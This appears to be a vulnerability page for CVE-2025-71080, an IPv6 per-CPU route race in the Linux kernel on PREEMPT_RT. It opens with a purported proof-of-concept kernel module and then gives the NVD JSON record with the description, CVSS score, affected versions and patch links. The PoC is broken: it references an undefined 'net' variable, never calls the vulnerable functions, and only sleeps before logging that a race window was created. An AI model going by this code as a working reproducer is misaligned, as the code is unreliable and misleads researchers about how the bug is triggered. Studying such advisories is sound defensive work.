CVE-2025-71080

// PoC for CVE-2025-71080: Race condition in rt6_get_pcpu_route() // This demonstrates the vulnerability by adding delay after rt6_get_pcpu_route() // to increase the likelihood of race condition occurrence #include <linux/kernel.h> #include <linux/module.h> #include <linux/init.h> #include <net/ipv6.h> #include <net/route.h> #include <linux/delay.h> MODULE_LICENSE("GPL"); MODULE_AUTHOR("POC Author"); MODULE_DESCRIPTION("PoC for CVE-2025-71080 - rt6_get_pcpu_route race condition"); static int __init cve_2025_71080_init(void) { struct rt6_info *rt = NULL; struct fib6_table *table; struct in6_addr addr; pr_info("CVE-2025-71080 PoC: Triggering race condition in rt6_get_pcpu_route\n"); // Initialize test IPv6 address addr = in6addr_loopback; // Get table (this is context-dependent) table = fib6_get_table(net, RT6_TABLE_MAIN); if (!table) { pr_err("Failed to get FIB6 table\n"); return -ENOENT; } // This simulates the race condition trigger // In real scenario, multiple threads calling rt6_get_pcpu_route() // with mdelay() after the call would trigger the bug // The vulnerability is triggered when: // 1. Thread A calls rt6_get_pcpu_route() -> returns NULL // 2. Thread A is preempted (on PREEMPT_RT kernel) // 3. Thread B on same CPU calls rt6_make_pcpu_route() -> installs pcpu_rt // 4. Thread A resumes -> cmpxchg() fails -> BUG_ON triggered // Adding delay increases the race window mdelay(100); // This simulates the race condition timing pr_info("PoC loaded. Race condition window created.\n"); return 0; } static void __exit cve_2025_71080_exit(void) { pr_info("CVE-2025-71080 PoC unloaded\n"); } module_init(cve_2025_71080_init); module_exit(cve_2025_71080_exit);

{"cve": {"id": "CVE-2025-71080", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-01-13T16:16:07.550", "lastModified": "2026-03-25T19:42:22.610", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: fix a BUG in rt6_get_pcpu_route() under PREEMPT_RT\n\nOn PREEMPT_RT kernels, after rt6_get_pcpu_route() returns NULL, the\ncurrent task can be preempted. Another task running on the same CPU\nmay then execute rt6_make_pcpu_route() and successfully install a\npcpu_rt entry. When the first task resumes execution, its cmpxchg()\nin rt6_make_pcpu_route() will fail because rt6i_pcpu is no longer\nNULL, triggering the BUG_ON(prev). It's easy to reproduce it by adding\nmdelay() after rt6_get_pcpu_route().\n\nUsing preempt_disable/enable is not appropriate here because\nip6_rt_pcpu_alloc() may sleep.\n\nFix this by handling the cmpxchg() failure gracefully on PREEMPT_RT:\nfree our allocation and return the existing pcpu_rt installed by\nanother task. The BUG_ON is replaced by WARN_ON_ONCE for non-PREEMPT_RT\nkernels where such races should not occur."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nipv6: corregir un BUG en rt6_get_pcpu_route() bajo PREEMPT_RT\n\nEn kernels PREEMPT_RT, después de que rt6_get_pcpu_route() devuelve NULL, la tarea actual puede ser desalojada. Otra tarea ejecutándose en la misma CPU puede entonces ejecutar rt6_make_pcpu_route() e instalar exitosamente una entrada pcpu_rt. Cuando la primera tarea reanuda la ejecución, su cmpxchg() en rt6_make_pcpu_route() fallará porque rt6i_pcpu ya no es NULL, lo que activa el BUG_ON(prev). Es fácil reproducirlo añadiendo mdelay() después de rt6_get_pcpu_route().\n\nUsar preempt_disable/enable no es apropiado aquí porque ip6_rt_pcpu_alloc() puede dormir.\n\nSolucionar esto manejando el fallo de cmpxchg() de forma elegante en PREEMPT_RT: liberar nuestra asignación y devolver el pcpu_rt existente instalado por otra tarea. El BUG_ON es reemplazado por WARN_ON_ONCE para kernels que no son PREEMPT_RT donde tales condiciones de carrera no deberían ocurrir."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-617"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.12.1", "versionEndExcluding": "6.12.64", "matchCriteriaId": "087ADCE7-533D-4BFC-9FB3-A1872B77A2AA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.4", "matchCriteriaId": "DC988EA0-0E32-457A-BF95-89BEB31A227B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.12:-:*:*:*:*:*:*", "matchCriteriaId": "0E698080-7669-4132-8817-4C674EEBCE54"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc1:*:*:*:*:*:*", "matchCriteriaId": "17B67AA7-40D6-4AFA-8459-F200F3D7CFD1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc2:*:*:*:*:*:*", "matchCriteriaId": "C47E4CC9-C826-4FA9-B014-7FE3D9B318B2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc3:*:*:*:*:*:*", "matchCriteriaId": "F71D92C0-C023-48BD-B3B6-70B638EEE298"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc4:*:*:*:*:*:*", "matchCriteriaId": "13580667-0A98-40CC-B29F-D12790B91BDB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc5:*:*:*:*:*:*", "matchCriteriaId": "CAD1FED7-CF48-47BF-AC7D-7B6FA3C065FC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc6:*:*:*:*:*:*", "matchCriteriaId": "3EF854A1-ABB1-4E93-BE9A-44569EC76C0D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc7:*:*:*:*:*:*", "matchCriteriaId": "F5DC0CA6-F0AF-4DDF-A882-3DADB9A886A7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc8:*:*:*:*:*:*", "matchCriteriaId": "EB5B7DFC-C36B-45D8-922C-877569FDDF43"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/1adaea51c61b52e24e7ab38f7d3eba023b2d050d", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/1dc33ad0867325f8d2c6d7b2a6f542d4f3121f66", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/st ... (truncated)